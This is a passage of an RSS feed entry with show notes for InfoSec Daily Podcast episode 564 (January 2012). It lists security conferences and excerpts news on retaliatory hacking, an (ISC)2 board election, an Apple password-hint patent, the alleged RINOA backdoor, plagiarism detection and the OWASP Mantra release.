	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.globes.co.il/serveen/globes/docview.asp?did=1000713894"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.globes.co.il/serveen/globes/docview.asp?did=1000713894</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli hackers decided this past weekend to retaliate in an unorganized fashion: On an Israeli hacking forum, personal details were revealed (including phone numbers) of users from an Arab website that was hacked by an Israeli. Another column on the screen that was hidden could have been credit card details of the users. In addition, a number of other Arab sites were hacked into over the weekend, apparently by Israelis.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the meantime, Arab hackers have published a list of Israeli sites that they consider vulnerable to break-ins, and invited other hackers to hack into them. Security specialist Jacky Altel noticed this announcement on the Pastebin website. &quot;If your website URL ends with the letters .il, then your information is not protected,&quot; hackers wrote in an announcement and said that data that appeared in the announcement was their proof. &quot;All of this information was gathered in just 43 minutes from the moment that we turned on our laptop until the moment we posted it here on this site,&quot; they write.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Altel says, &quot;They published a list of sites they identified as vulnerable to attack and to being taken over remotely, and they are asking that everyone combine their knowledge as a large group in an effort to harm Israel and its systems.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://pastebin.com/itXpkzQB"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> https://www.isc2.org/PressReleaseDetails.aspx?id=8202</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Palm Harbor, Fla., U.S.A., January 11, 2012 (ISC)&#39; (ISC-squared), the worlds largest information security professional body and administrators of the CISSP&#39;, today announced the results of the election for its 2012 Board of Directors. The Board provides governance and oversight for the organization, grants certifications to qualifying candidates and enforces adherence to the (ISC) Code of Ethics.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Effective January 1, 2012, the following individuals began serving three-year terms on (ISC)s Board of Directors:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Daniel D. Houser, CISSP-ISSAP, CSSLP, senior security and identity architect for a Global 100 healthcare organization (U.S.A.)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wim Remes, CISSP, manager of Information Security at Ernst &amp; Young ITRA FSO (Belgium)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prof. Jill Slay (AM), Ph.D., CISSP, Fellow of (ISC)2, dean: Research in the Division of IT, Engineering and the Environment at the University of South Australia, and professor of Forensic Computing (Australia)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Greg Thompson, CISSP, vice president and deputy CISO at Scotiabank (Canada)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Given the growing intensity of global security threats and the deepening need to fill the pipeline of cyber security professionals, the fresh, diverse perspectives and expertise of these new members will help us to address the current challenges that the cyber security professionals is are facing globally, said Freddy Tan, CISSP, acting (ISC) board chairperson. Last year, our Board made great strides, through introduction of new programs, scholarships and educational opportunities to our members and to benefit the broader digital community. We are pleased that these individuals will be joining a team of dedicated volunteers who have committed to providing their time and wisdom to representing the needs of and advancing the professionalism and competency of our members globally.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to voting in the annual Board of Director elections, (ISC)2 members are also provided with exclusive membership benefits. Throughout 2011, the organization significantly expanded its offerings to include the introduction of:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new global Chapter Program, providing members with the opportunity to build their own chapters anywhere in the world;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first annual (ISC)2 Security Congress, designed specifically for the career development needs of (ISC)2 members; and</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The (ISC)2 Foundation, a 501(c)(3) non-profit organization that drives (ISC)2s goodwill programs, such as Safe and Secure Online and the Information Security Scholarship Program.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The four newly elected professionals will join the ranks of other top information security professionals from around the world representing academia, private organizations and government agencies. Each of the Board members volunteer to provide strategic direction for the organization and are (ISC)-certified.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For a complete list of current Board members, please visit: https://www.isc2.org/board-of-directors.aspx. For information on the (ISC) Board of Directors election process, please visit https://www.isc2.org/board-election-process.aspx.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">About (ISC)2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(ISC) is the largest not-for-profit membership body of certified information security professionals worldwide, with over 80,000 members in more than 135 countries. Globally recognized as the Gold Standard, (ISC) issues the Certified Information Systems Security Professional (CISSP) and related concentrations, as well as the Certified Secure Software Lifecycle Professional (CSSLP), Certified Authorization Professional (CAP), and Systems Security Certified Practitioner (SSCP) credentials to qualifying candidates. (ISC)s certifications are among the first information technology credentials to meet the stringent requirements of ISO/IEC Standard 17024, a global benchmark for assessing and certifying personnel. (ISC) also offers education programs and services based on its CBK&#39;, a compendium of information security topics. More information is available at www.isc2.org</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.ehackingnews.com/2012/01/recover-forgotten-login-passwords-using.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ehackingnews.com/2012/01/recover-forgotten-login-passwords-using.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The New Scientist has</span><a href="http://www.newscientist.com/blogs/onepercent/2012/01/forgotten-your-password-ask-yo.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> uncovered</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a new patent from Apple that stores password recovery secrets into peripheral devices, including a power adapter. The patent aims to stop thieves of laptops, iPads and iPhones gaining unauthorised access to the portable computing devices.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The application would prompt you to plug in your specific power adapter to confirm your identity. The memory chip on your power charger could store your password secret &#8211; for instance, an encrypted version of your password reminder hint. If you&#39;ve forgotten your password you could just plug your laptop into the wall, to receive the secret password hint.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The password hint can be stored in other peripheral devices such as printer, an external monitor or a wireless router.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/india/have-rim-nokia-apple-provided-indian-military-with-backdoor-access-to-cellular-comm/838"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/india/have-rim-nokia-apple-provided-indian-military-with-backdoor-access-to-cellular-comm/838</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In exchange for mobile presence in India, RIM, Nokia and Apple have allegedly provided backdoor access for the Indian intelligence to spy on communication. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On January 6th reports of Symantec (makers of Norton Anitvirus) being hacked surfaced. The group of hackers behind the attack behind the attack were from India. In a statement issued by a member from the Lords of Dharamraja group (badass name!), the guys said:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of now we start sharing with all our brothers and followers information from the Indian Militaty (sic) Intelligence servers, so far we have discovered within the Indian Spy Programme (sic) source codes of a dozen software companies which have signed agreements with Indian TANCS programme (sic) and CBI.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ignoring the typing error, gaining access to Indian Military&rsquo;s Intelligence servers is pretty damning for the agency. The hack got covered since the hackers claimed to have access to Norton&rsquo;s source code. Earlier</span><a href="https://twitter.com/#%21/csoghoian/status/155524871009468416"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> today I came across</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> scans of a set of documents that are internal communications between the Indian Military. The documents claim the existence of a system known as RINOA SUR. While I did not find what SUR stands for but RINOA is RIM, NOkia and Apple. And this is where things start to get very interesting, according to the set of documents, the RINOA SUR platform was used to spy on</span><a href="http://www.uscc.gov/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> the USCC</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;the US-China Economic and Security Review Commission.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.cgisecurity.com/2012/01/detecting-plagiarism-with-google-and-book-search.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cgisecurity.com/2012/01/detecting-plagiarism-with-google-and-book-search.html</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://attrition.org/errata/plagiarism/detecting_plagiarism.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://attrition.org/errata/plagiarism/detecting_plagiarism.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With the</span><a href="http://attrition.org/errata/plagiarism/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> recent rash of plagiarism exposure</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, one of the most frequent questions we get is &quot;how do you find plagiarism?&quot; Our methodology is home-grown and very simple. We assume that we are only catching some of it, and that our methodology causes us to miss some cases. Rather than read our layman views on the matter, we encourage you to read the</span><a href="http://journalism.nyu.edu/assets/PageSpecificFiles/Ethics/NYU-Journalism-Handbook-for-Students.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> NYU Ethics Handbook</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> written by Professor Adam Penenberg. The entire handbook is worth reading, but you can jump to section 9, &quot;Cardinal Sins&quot;, to read about plagiarism.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Before we get into the &quot;how&quot;, we want to address a second question and concern; what is plagiarism and how can I avoid it?</span></p>
<p>	<a href="http://en.wikipedia.org/wiki/Plagiarism"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Plagiarism</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;&nbsp;Plagiarism is defined in dictionaries as the &quot;wrongful appropriation,&quot; &quot;close imitation,&quot; or &quot;purloining and publication&quot; of another author&#39;s &quot;language, thoughts, ideas, or expressions,&quot; and the representation of them as one&#39;s own original work&#8230;</span><br />
	<a href="http://en.wikipedia.org/wiki/Copyright"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Copyright</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;A copyright is a set of exclusive rights granted by a state to the creator of an original work or their assignee for a limited period of time upon disclosure of the work. This includes the right to copy, distribute and adapt the work.</span><br />
	<a href="http://en.wikipedia.org/wiki/Copyright_infringement"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Copyright_infringement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;Copyright infringement is the unauthorized or prohibited use of works under copyright, infringing the copyright holder&#39;s exclusive rights, such as the right to reproduce or perform the copyrighted work, or to make derivative works.</span><br />
	<a href="http://en.wikipedia.org/wiki/Fair_use_doctrine"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://en.wikipedia.org/wiki/Fair_use_doctrine</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;In United States copyright law, fair use is a doctrine that permits limited use of copyrighted material without acquiring permission from the rights holders. Examples of fair use include commentary, criticism, news reporting, research, teaching, library archiving and scholarship.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.vulnerabilitydatabase.com/2012/01/owasp-mantra-armada-v0-81-beta-released/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.vulnerabilitydatabase.com/2012/01/owasp-mantra-armada-v0-81-beta-released/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OWASP Mantra is such an innovative product, a security framework built on top of a browser. Its cross platform, portable and can run out of the box. You can take it with you where ever you go in absolutely any rewritable media including memory cards, flash drives and portable hard disks. More over, Mantra can be used for both offensive security and defensive security related tasks which makes it incredible.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here comes OWASP Mantra 0.81 Beta, codenamed Armada, based on Mozilla Firefox 9.0.1 and work out of the box with Linux, Windows and Macintosh.</span><img height="260px;" src="https://lh5.googleusercontent.com/yQg9Iu5WrDi0QbKPJxUIsf7UKvSDWJGx-8tkNEcfHGCOajlld4JjI-yn-UdCNb9jO2lcyAWE6c2RPbXBpXbP7Ck88pZy8Fb_PaqgDQXxTaJjgkwelh8" width="462px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">List of new features:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Addons</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Updated Base</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Galley Integration: It is a collection of links of online tools that can be helpful during penetration testing. Now you can access them right from the bookmarks.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Better Look and feel: FXChrome &ndash; Lite and takes less space</span></li>
</ul>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Download</span><a href="http://www.getmantra.com/download/mantra-security-toolkit/index.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> OWASP Mantra Armada v0.81 Beta</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Project Page: </span><a href="https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-564-retaliation-its-official-forgotten-passwords-rinoa-detecting-plagiarism-owasp-mantra/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3352/0/infosec-daily-podcast-episode-564.mp3" length="23656216" type="audio/mpeg" />
		<itunes:duration>0:49:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 564 for January 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over [...]</itunes:subtitle>
